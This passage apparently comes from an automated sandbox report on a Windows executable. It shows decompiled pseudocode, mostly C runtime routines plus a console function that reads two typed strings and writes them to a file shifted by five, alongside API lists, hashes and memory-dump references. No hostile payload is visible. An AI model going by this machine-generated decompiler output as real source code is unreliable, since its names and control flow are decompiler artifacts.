												if(__eflags == 0) {
													goto L17;
												} else {
													E00A54C99(_t46, 7);
													_t10 =  &_v8;
													 *_t10 = _v8 & 0x00000000;
													__eflags =  *_t10;
													_t55 = E00A5BD59(_t54);
													_v32 = _t55;
													_v8 = 0xfffffffe;
													E00A5BEEB();
													_t28 = _t55;
												}
											} else {
												L17:
												 *((intOrPtr*)(E00A553A7(__eflags))) = 0x16;
												E00A55155();
												_t28 = 0;
											}
											return E00A554F5(_t28);
										} else {
											goto L15;
										}
									} else {
										_t15 = 0x22;
										L10:
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t35 = E00A553A7(_t63);
					_t57 = 0x16;
					 *_t35 = _t57;
					E00A55155();
					_t15 = _t57;
					L11:
					return _t15;
				}
			}



















                                                        0x00a5bddd
                                                        0x00a5bde1
                                                        0x00a5bde5
                                                        0x00a5bde7
                                                        0x00a5bdfc
                                                        0x00a5bdff
                                                        0x00a5be03
                                                        0x00a5be06
                                                        0x00a5be08
                                                        0x00a5be3f
                                                        0x00a5be41
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5be0a
                                                        0x00a5be0a
                                                        0x00a5be0c
                                                        0x00a5be43
                                                        0x00a5be43
                                                        0x00a5be4a
                                                        0x00a5be4b
                                                        0x00a5be4d
                                                        0x00a5be52
                                                        0x00000000
                                                        0x00a5be0e
                                                        0x00a5be0e
                                                        0x00a5be0e
                                                        0x00a5be10
                                                        0x00a5be12
                                                        0x00a5be12
                                                        0x00a5be18
                                                        0x00a5be1e
                                                        0x00a5be21
                                                        0x00a5be23
                                                        0x00a5be67
                                                        0x00a5be67
                                                        0x00000000
                                                        0x00a5be25
                                                        0x00a5be2b
                                                        0x00a5be2d
                                                        0x00a5be2f
                                                        0x00a5be31
                                                        0x00000000
                                                        0x00a5be33
                                                        0x00a5be33
                                                        0x00a5be35
                                                        0x00a5be5b
                                                        0x00a5be63
                                                        0x00a5be65
                                                        0x00a5be6d
                                                        0x00a5be6e
                                                        0x00a5be6f
                                                        0x00a5be70
                                                        0x00a5be71
                                                        0x00a5be72
                                                        0x00a5be77
                                                        0x00a5be78
                                                        0x00a5be7a
                                                        0x00a5be7f
                                                        0x00a5be86
                                                        0x00a5be89
                                                        0x00a5be8e
                                                        0x00a5be90
                                                        0x00a5beb4
                                                        0x00a5beb6
                                                        0x00a5beba
                                                        0x00000000
                                                        0x00a5bebc
                                                        0x00a5bebe
                                                        0x00a5bec4
                                                        0x00a5bec4
                                                        0x00a5bec4
                                                        0x00a5becf
                                                        0x00a5bed1
                                                        0x00a5bed4
                                                        0x00a5bedb
                                                        0x00a5bee0
                                                        0x00a5bee0
                                                        0x00a5be92
                                                        0x00a5be92
                                                        0x00a5be97
                                                        0x00a5be9d
                                                        0x00a5bea2
                                                        0x00a5bea2
                                                        0x00a5bee7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5be37
                                                        0x00a5be39
                                                        0x00a5be3a
                                                        0x00000000
                                                        0x00a5be3a
                                                        0x00a5be35
                                                        0x00a5be31
                                                        0x00a5be23
                                                        0x00a5be0c
                                                        0x00a5bde9
                                                        0x00a5bde9
                                                        0x00a5bdf0
                                                        0x00a5bdf1
                                                        0x00a5bdf3
                                                        0x00a5bdf8
                                                        0x00a5be3b
                                                        0x00a5be3e
                                                        0x00a5be3e

                                                        APIs
                                                        • __getenv_helper_nolock.LIBCMT ref: 00A5BE18
                                                        • _strlen.LIBCMT ref: 00A5BE26
                                                          • Part of subcall function 00A553A7: __getptd_noexit.LIBCMT ref: 00A553A7
                                                        • _strnlen.LIBCMT ref: 00A5BEAD
                                                        • __lock.LIBCMT ref: 00A5BEBE
                                                        • __getenv_helper_nolock.LIBCMT ref: 00A5BEC9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                        • String ID:
                                                        • API String ID: 2168648987-0
                                                        • Opcode ID: 712bed0265efd189267d3246ae9398d1acbf077985c8f7a890d9495a01d27ec4
                                                        • Instruction ID: 36c92acda67487b123f59a3d03d3037d7da6a2e782dd0173233069a32c6e27c4
                                                        • Opcode Fuzzy Hash: 712bed0265efd189267d3246ae9398d1acbf077985c8f7a890d9495a01d27ec4
                                                        • Instruction Fuzzy Hash: E231E532A20A156ADB217F74AD437EE37A47F40B63F190125FE08DF281DB74D84886B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5CBBB, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00A5CBBB(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0xa70ac0, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0xa70bec - _t7;
								if(__eflags == 0) {
									_t9 = E00A553A7(__eflags);
									 *_t9 = E00A55400(GetLastError());
									goto L17;
								} else {
									__eflags = E00A5A745(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00A553A7(__eflags);
										 *_t12 = E00A55400(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00A5A745(_t6, _t31);
						 *((intOrPtr*)(E00A553A7(__eflags))) = 0xc;
						goto L12;
					} else {
						E00A54E32(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00A5CB29(__ebx, __edx, __edi, _a8);
				}
			}









                                                        0x00a5cbc2
                                                        0x00a5cbd0
                                                        0x00a5cbd3
                                                        0x00a5cbd5
                                                        0x00a5cbe4
                                                        0x00a5cc17
                                                        0x00a5cc17
                                                        0x00a5cc1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5cbe7
                                                        0x00a5cbe9
                                                        0x00a5cbeb
                                                        0x00a5cbeb
                                                        0x00a5cbeb
                                                        0x00a5cbf8
                                                        0x00a5cbfe
                                                        0x00a5cc00
                                                        0x00a5cc02
                                                        0x00a5cc62
                                                        0x00a5cc62
                                                        0x00a5cc04
                                                        0x00a5cc04
                                                        0x00a5cc0a
                                                        0x00a5cc4c
                                                        0x00a5cc60
                                                        0x00000000
                                                        0x00a5cc0c
                                                        0x00a5cc13
                                                        0x00a5cc15
                                                        0x00a5cc34
                                                        0x00a5cc48
                                                        0x00a5cc2e
                                                        0x00a5cc2e
                                                        0x00a5cc2e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5cc15
                                                        0x00a5cc0a
                                                        0x00000000
                                                        0x00a5cc30
                                                        0x00a5cc1d
                                                        0x00a5cc28
                                                        0x00000000
                                                        0x00a5cbd7
                                                        0x00a5cbda
                                                        0x00a5cbe0
                                                        0x00a5cbe0
                                                        0x00a5cc31
                                                        0x00a5cc33
                                                        0x00a5cbc4
                                                        0x00a5cbce
                                                        0x00a5cbce

                                                        APIs
                                                        • _malloc.LIBCMT ref: 00A5CBC7
                                                          • Part of subcall function 00A5CB29: __FF_MSGBANNER.LIBCMT ref: 00A5CB40
                                                          • Part of subcall function 00A5CB29: __NMSG_WRITE.LIBCMT ref: 00A5CB47
                                                          • Part of subcall function 00A5CB29: HeapAlloc.KERNEL32(00B30000,00000000,00000001,00000000,?,00000000,?,00A54ECA,00000000,00000000,00000000,?,?,00A54D82,00000018,00A6CF88), ref: 00A5CB6C
                                                        • _free.LIBCMT ref: 00A5CBDA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AllocHeap_free_malloc
                                                        • String ID:
                                                        • API String ID: 2734353464-0
                                                        • Opcode ID: 271ccf858a8110cfdf8822e01462feb6c9d9c1315dae155ebb472af527c0f833
                                                        • Instruction ID: 1f2f8d840eec0121fd578ccf61705359d9dcaef983c39c61bee482ee4d30af9d
                                                        • Opcode Fuzzy Hash: 271ccf858a8110cfdf8822e01462feb6c9d9c1315dae155ebb472af527c0f833
                                                        • Instruction Fuzzy Hash: 4E113632804301AFCB212BB4BD45A5E3BB9BF043B7F214025FC4CDA154DA71CC898A91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5B249, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E00A5B249(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0xa6d188);
				E00A554B0(__ebx, __edi, __esi);
				_t31 = E00A5C476(__edi, _t35);
				_t25 =  *0xa6fee4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00A54C99(_t29, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xa6f76c; // 0xb424d8
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xa6fa68;
								if(__eflags != 0) {
									E00A54E32(_t33);
								}
							}
						}
						_t20 =  *0xa6f76c; // 0xb424d8
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0xa6f76c; // 0xb424d8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00A5B2E5();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E00A53CF0(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E00A554F5(_t33);
			}










                                                        0x00a5b249
                                                        0x00a5b249
                                                        0x00a5b249
                                                        0x00a5b249
                                                        0x00a5b24b
                                                        0x00a5b250
                                                        0x00a5b25a
                                                        0x00a5b25c
                                                        0x00a5b265
                                                        0x00a5b286
                                                        0x00a5b28c
                                                        0x00a5b290
                                                        0x00a5b293
                                                        0x00a5b296
                                                        0x00a5b29c
                                                        0x00a5b29e
                                                        0x00a5b2a0
                                                        0x00a5b2a9
                                                        0x00a5b2ab
                                                        0x00a5b2ad
                                                        0x00a5b2b3
                                                        0x00a5b2b6
                                                        0x00a5b2bb
                                                        0x00a5b2b3
                                                        0x00a5b2ab
                                                        0x00a5b2bc
                                                        0x00a5b2c1
                                                        0x00a5b2c4
                                                        0x00a5b2ca
                                                        0x00a5b2ce
                                                        0x00a5b2ce
                                                        0x00a5b2d4
                                                        0x00a5b2db
                                                        0x00a5b26d
                                                        0x00a5b26d
                                                        0x00a5b26d
                                                        0x00a5b270
                                                        0x00a5b272
                                                        0x00a5b276
                                                        0x00a5b27b
                                                        0x00a5b283

                                                        APIs
                                                          • Part of subcall function 00A5C476: __getptd_noexit.LIBCMT ref: 00A5C477
                                                          • Part of subcall function 00A5C476: __amsg_exit.LIBCMT ref: 00A5C484
                                                        • __amsg_exit.LIBCMT ref: 00A5B276
                                                        • __lock.LIBCMT ref: 00A5B286
                                                        • InterlockedDecrement.KERNEL32(?), ref: 00A5B2A3
                                                        • _free.LIBCMT ref: 00A5B2B6
                                                        • InterlockedIncrement.KERNEL32(00B424D8), ref: 00A5B2CE
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                        • String ID:
                                                        • API String ID: 1231874560-0
                                                        • Opcode ID: cac5b11efd38d3de209bbb527a08fc6f400fb84788faef23afc634b7d92ca76a
                                                        • Instruction ID: a4ba588e6ef97af0e027ac33ca9a4e7d87fb6c4face7d8ba87d1e909a189a2a3
                                                        • Opcode Fuzzy Hash: cac5b11efd38d3de209bbb527a08fc6f400fb84788faef23afc634b7d92ca76a
                                                        • Instruction Fuzzy Hash: 6B018031D11721EBCB11EBA8AA0679EB770BF05727F044019EC14A7291CBB46D8ACBF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A6221B, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E00A6221B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t35;
				intOrPtr* _t37;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_push(0xc);
				_push(0xa6d3e0);
				E00A554B0(__ebx, __edi, __esi);
				_t35 = E00A5C476(__edi, _t39);
				_t37 = E00A54E6A(8, 1);
				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
				_t40 = _t37;
				if(_t37 != 0) {
					E00A5E249(__ebx, __edx, _t35, _t37, __eflags);
					E00A5B249(__ebx, __edx, _t35, _t37, __eflags);
					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
					 *(_t37 + 4) =  *(_t35 + 0x68);
					E00A54C99(__edx, 0xc);
					_t5 = _t38 - 4;
					 *_t5 =  *(_t38 - 4) & 0x00000000;
					__eflags =  *_t5;
					E00A5DFC4( *_t37);
					 *(_t38 - 4) = 0xfffffffe;
					E00A628D5();
					E00A54C99(__edx, 0xd);
					 *(_t38 - 4) = 1;
					InterlockedIncrement( *(_t37 + 4));
					 *(_t38 - 4) = 0xfffffffe;
					E00A628E1();
					_t24 = _t37;
				} else {
					 *((intOrPtr*)(E00A553A7(_t40))) = 0xc;
					_t24 = 0;
				}
				return E00A554F5(_t24);
			}








                                                        0x00a6221b
                                                        0x00a6283b
                                                        0x00a6283d
                                                        0x00a62842
                                                        0x00a6284c
                                                        0x00a62859
                                                        0x00a6285b
                                                        0x00a6285e
                                                        0x00a62860
                                                        0x00a62871
                                                        0x00a62876
                                                        0x00a6287e
                                                        0x00a62883
                                                        0x00a62888
                                                        0x00a6288e
                                                        0x00a6288e
                                                        0x00a6288e
                                                        0x00a62894
                                                        0x00a6289a
                                                        0x00a628a1
                                                        0x00a628a8
                                                        0x00a628ae
                                                        0x00a628b8
                                                        0x00a628be
                                                        0x00a628c5
                                                        0x00a628ca
                                                        0x00a62862
                                                        0x00a62867
                                                        0x00a6286d
                                                        0x00a6286d
                                                        0x00a628d1

                                                        APIs
                                                          • Part of subcall function 00A5C476: __getptd_noexit.LIBCMT ref: 00A5C477
                                                          • Part of subcall function 00A5C476: __amsg_exit.LIBCMT ref: 00A5C484
                                                        • __calloc_crt.LIBCMT ref: 00A62852
                                                          • Part of subcall function 00A54E6A: __calloc_impl.LIBCMT ref: 00A54E79
                                                          • Part of subcall function 00A54E6A: Sleep.KERNEL32(00000000), ref: 00A54E90
                                                        • __lock.LIBCMT ref: 00A62888
                                                        • ___addlocaleref.LIBCMT ref: 00A62894
                                                        • __lock.LIBCMT ref: 00A628A8
                                                        • InterlockedIncrement.KERNEL32(?), ref: 00A628B8
                                                          • Part of subcall function 00A553A7: __getptd_noexit.LIBCMT ref: 00A553A7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                        • String ID:
                                                        • API String ID: 2144732038-0
                                                        • Opcode ID: 493378f4021672dc0b105bea403b622292cf7e9f41eae228f36cafdf86a1bddc
                                                        • Instruction ID: 9d16fdbf7ca50c290bae6467389e193b356c29f0f88d996843000d8c0bacfcd5
                                                        • Opcode Fuzzy Hash: 493378f4021672dc0b105bea403b622292cf7e9f41eae228f36cafdf86a1bddc
                                                        • Instruction Fuzzy Hash: E1017C71901B01EEEB20BFB49A07B5C77B1BF45762F204509FC45AB2D2CB7499888B61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A51930, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E00A51930(void* __ebx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				short _v11;
				short _v15;
				short _v19;
				short _v23;
				char _v24;
				short _v27;
				short _v31;
				short _v35;
				short _v39;
				char _v40;
				char _v44;
				char _v48;
				char _v49;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				void* __ebp;
				signed int _t93;
				char _t97;
				char _t104;
				intOrPtr _t105;
				char _t108;
				char _t112;
				intOrPtr _t115;
				char _t130;
				intOrPtr _t133;
				intOrPtr _t150;
				intOrPtr _t160;
				char _t167;
				signed int _t172;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;

				_t171 = __esi;
				_t170 = __edi;
				_t156 = __edx;
				_t137 = __ebx;
				_t93 =  *0xa6f360; // 0x51accb5
				_v8 = _t93 ^ _t172;
				_v24 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				_v11 = 0;
				_v40 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				E00A5401F(__ebx, __edx, __edi, __eflags, "cls");
				_t97 = E00A52DAF(0xa6f01c, 0xa6f018);
				_t175 = _t173 + 0xc;
				_v48 = _t97;
				if(_v48 != 0) {
					L4:
					_push(_v48);
					E00A52986(_t137, _t170, _t171, __eflags);
					_t176 = _t175 + 4;
					_v60 = E00A51000(_t137, _t170, _t171);
					__eflags = _v60 - 1;
					if(_v60 != 1) {
						do {
							__eflags = _v60;
							if(__eflags != 0) {
								goto L33;
							} else {
								_v44 = 0;
								_v64 = 0;
								_push(E00A5283E());
								E00A52AB0(_t137, _t170, _t171, __eflags);
								_t177 = _t176 + 4;
								_t104 = E00A6945E(_t137, _t156, _t170, _t171, __eflags);
								__eflags = 1;
								 *((char*)(_t172 + 0xffffffffffffffec)) = _t104;
								while(1) {
									_t105 = _v44;
									__eflags =  *((char*)(_t172 + _t105 - 0x14)) - 0xd;
									if( *((char*)(_t172 + _t105 - 0x14)) == 0xd) {
										break;
									}
									_t168 = _v44;
									__eflags =  *((char*)(_t172 + _v44 - 0x14)) - 8;
									if(__eflags != 0) {
										_t130 = _v44 + 1;
										__eflags = _t130;
										_v44 = _t130;
										 *((char*)(_t172 + _v44 - 0x14)) = E00A6945E(_t137, _t168, _t170, _t171, _t130);
									} else {
										_v44 = _v44 - 1;
										 *((char*)(_t172 + _v44 - 0x14)) = E00A6945E(_t137, _t168, _t170, _t171, __eflags);
									}
								}
								_t159 = _v44;
								_v56 = _v44;
								__eflags = _v56 - 0xf;
								if(__eflags >= 0) {
									E00A525B6();
								}
								 *((char*)(_t172 + _v56 - 0x14)) = 0;
								_v44 = 0;
								_t108 = E00A6945E(_t137, _t159, _t170, _t171, __eflags);
								__eflags = 1;
								 *((char*)(_t172 + 0xffffffffffffffdc)) = _t108;
								while(1) {
									_t160 = _v44;
									__eflags =  *((char*)(_t172 + _t160 - 0x24)) - 0xd;
									if( *((char*)(_t172 + _t160 - 0x24)) == 0xd) {
										break;
									}
									_t150 = _v44;
									_t165 =  *((char*)(_t172 + _t150 - 0x24));
									__eflags =  *((char*)(_t172 + _t150 - 0x24)) - 8;
									if(__eflags != 0) {
										_t167 = _v44 + 1;
										__eflags = _t167;
										_v44 = _t167;
										 *((char*)(_t172 + _v44 - 0x24)) = E00A6945E(_t137, _t167, _t170, _t171, _t167);
									} else {
										_v44 = _v44 - 1;
										 *((char*)(_t172 + _v44 - 0x24)) = E00A6945E(_t137, _t165, _t170, _t171, __eflags);
									}
								}
								_v68 = _v44;
								__eflags = _v68 - 0xf;
								if(_v68 >= 0xf) {
									E00A525B6();
								}
								 *((char*)(_t172 + _v68 - 0x24)) = 0;
								_t156 =  &_v24;
								_t112 = E00A54850( &_v24,  &_v40);
								_t176 = _t177 + 8;
								__eflags = _t112;
								if(_t112 != 0) {
									_v64 = 1;
									goto L33;
								} else {
									_t115 = E00A52DAF(0xa6f02c, 0xa6f028);
									_t178 = _t176 + 8;
									_v48 = _t115;
									__eflags = _v48;
									if(__eflags != 0) {
										_v44 = 0;
										while(1) {
											__eflags =  *((char*)(_t172 + _v44 - 0x14));
											if(__eflags == 0) {
												break;
											}
											_v49 =  *((intOrPtr*)(_t172 + _v44 - 0x14));
											_push(_v48);
											_push(_v49 + 5);
											E00A535C4(_t137, _t170, _t171, __eflags);
											_t178 = _t178 + 8;
											_v44 = _v44 + 1;
										}
										_push(_v48);
										_push(0xffffffff);
										E00A535C4(_t137, _t170, _t171, __eflags);
										_t156 = _v48;
										_push(_v48);
										E00A52986(_t137, _t170, _t171, __eflags);
										_t176 = _t178 + 0xc;
										goto L33;
									} else {
										E00A6945E(_t137,  &_v24, _t170, _t171, __eflags);
									}
								}
							}
							goto L35;
							L33:
							__eflags = _v64 - 1;
						} while (__eflags == 0);
						E00A6945E(_t137, _t156, _t170, _t171, __eflags);
					} else {
					}
				} else {
					_t133 = E00A52DAF(0xa6f024, 0xa6f020);
					_t180 = _t175 + 8;
					_v48 = _t133;
					_t183 = _v48;
					if(_v48 != 0) {
						_t156 = _v48;
						_push(_v48);
						E00A52986(__ebx, __edi, __esi, __eflags);
						_t175 = _t180 + 4;
						E00A6945E(__ebx, _v48, __edi, __esi, __eflags);
						goto L4;
					} else {
						E00A6945E(__ebx, __edx, __edi, __esi, _t183);
					}
				}
				L35:
				return E00A548DC(_t137, _v8 ^ _t172, _t156, _t170, _t171);
			}









































                                                        0x00a51930
                                                        0x00a51930
                                                        0x00a51930
                                                        0x00a51930
                                                        0x00a51936
                                                        0x00a5193d
                                                        0x00a51940
                                                        0x00a51946
                                                        0x00a51949
                                                        0x00a5194c
                                                        0x00a5194f
                                                        0x00a51953
                                                        0x00a51959
                                                        0x00a5195c
                                                        0x00a5195f
                                                        0x00a51962
                                                        0x00a5196b
                                                        0x00a5197d
                                                        0x00a51982
                                                        0x00a51985
                                                        0x00a5198c
                                                        0x00a519c4
                                                        0x00a519c7
                                                        0x00a519c8
                                                        0x00a519cd
                                                        0x00a519d5
                                                        0x00a519d8
                                                        0x00a519dc
                                                        0x00a519e3
                                                        0x00a519e3
                                                        0x00a519e7
                                                        0x00000000
                                                        0x00a519ed
                                                        0x00a519ed
                                                        0x00a519f4
                                                        0x00a51a0a
                                                        0x00a51a0b
                                                        0x00a51a10
                                                        0x00a51a13
                                                        0x00a51a1d
                                                        0x00a51a20
                                                        0x00a51a24
                                                        0x00a51a24
                                                        0x00a51a2c
                                                        0x00a51a2f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51a31
                                                        0x00a51a39
                                                        0x00a51a3c
                                                        0x00a51a58
                                                        0x00a51a58
                                                        0x00a51a5b
                                                        0x00a51a66
                                                        0x00a51a3e
                                                        0x00a51a44
                                                        0x00a51a4f
                                                        0x00a51a4f
                                                        0x00a51a6a
                                                        0x00a51a6c
                                                        0x00a51a6f
                                                        0x00a51a72
                                                        0x00a51a76
                                                        0x00a51a7a
                                                        0x00a51a7a
                                                        0x00a51a82
                                                        0x00a51a87
                                                        0x00a51a8e
                                                        0x00a51a98
                                                        0x00a51a9b
                                                        0x00a51a9f
                                                        0x00a51a9f
                                                        0x00a51aa7
                                                        0x00a51aaa
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51aac
                                                        0x00a51aaf
                                                        0x00a51ab4
                                                        0x00a51ab7
                                                        0x00a51ad3
                                                        0x00a51ad3
                                                        0x00a51ad6
                                                        0x00a51ae1
                                                        0x00a51ab9
                                                        0x00a51abf
                                                        0x00a51aca
                                                        0x00a51aca
                                                        0x00a51ae5
                                                        0x00a51aea
                                                        0x00a51aed
                                                        0x00a51af1
                                                        0x00a51af5
                                                        0x00a51af5
                                                        0x00a51afd
                                                        0x00a51b06
                                                        0x00a51b0a
                                                        0x00a51b0f
                                                        0x00a51b12
                                                        0x00a51b14
                                                        0x00a51b90
                                                        0x00000000
                                                        0x00a51b16
                                                        0x00a51b20
                                                        0x00a51b25
                                                        0x00a51b28
                                                        0x00a51b2b
                                                        0x00a51b2f
                                                        0x00a51b38
                                                        0x00a51b3f
                                                        0x00a51b47
                                                        0x00a51b49
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51b52
                                                        0x00a51b58
                                                        0x00a51b60
                                                        0x00a51b61
                                                        0x00a51b66
                                                        0x00a51b6f
                                                        0x00a51b6f
                                                        0x00a51b77
                                                        0x00a51b78
                                                        0x00a51b7a
                                                        0x00a51b82
                                                        0x00a51b85
                                                        0x00a51b86
                                                        0x00a51b8b
                                                        0x00000000
                                                        0x00a51b31
                                                        0x00a51b31
                                                        0x00a51b31
                                                        0x00a51b2f
                                                        0x00a51b14
                                                        0x00000000
                                                        0x00a51b97
                                                        0x00a51b97
                                                        0x00a51b97
                                                        0x00a51ba1
                                                        0x00000000
                                                        0x00a519de
                                                        0x00a5198e
                                                        0x00a51998
                                                        0x00a5199d
                                                        0x00a519a0
                                                        0x00a519a3
                                                        0x00a519a7
                                                        0x00a519b3
                                                        0x00a519b6
                                                        0x00a519b7
                                                        0x00a519bc
                                                        0x00a519bf
                                                        0x00000000
                                                        0x00a519a9
                                                        0x00a519a9
                                                        0x00a519a9
                                                        0x00a519a7
                                                        0x00a51ba6
                                                        0x00a51bb3

                                                        APIs
                                                        • __wsystem.LIBCMT ref: 00A5196B
                                                          • Part of subcall function 00A5401F: __wdupenv_s.LIBCMT ref: 00A54038
                                                          • Part of subcall function 00A5401F: _free.LIBCMT ref: 00A540E7
                                                          • Part of subcall function 00A52DAF: __fsopen.LIBCMT ref: 00A52DBA
                                                          • Part of subcall function 00A6945E: __lock.LIBCMT ref: 00A6946C
                                                          • Part of subcall function 00A6945E: __getch_nolock.LIBCMT ref: 00A69476
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __fsopen__getch_nolock__lock__wdupenv_s__wsystem_free
                                                        • String ID: cls
                                                        • API String ID: 4083991176-3046418502
                                                        • Opcode ID: 87d75f113912a84b99be09b4981138fc80cc839f2237ac5900e881fe8ed2b0d2
                                                        • Instruction ID: 706d6a6cc082bb0ac5d62c77c203bdb41164d8461b3d5555bde03e99776a9fb0
                                                        • Opcode Fuzzy Hash: 87d75f113912a84b99be09b4981138fc80cc839f2237ac5900e881fe8ed2b0d2
                                                        • Instruction Fuzzy Hash: 3D718B70D04248AFDB04DFE4D695BFEBFB1BF19316F184029E90177242EA359A48CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A54AE2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 33%
                                                        			E00A54AE2(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t5;

				_v8 = _v8 & 0x00000000;
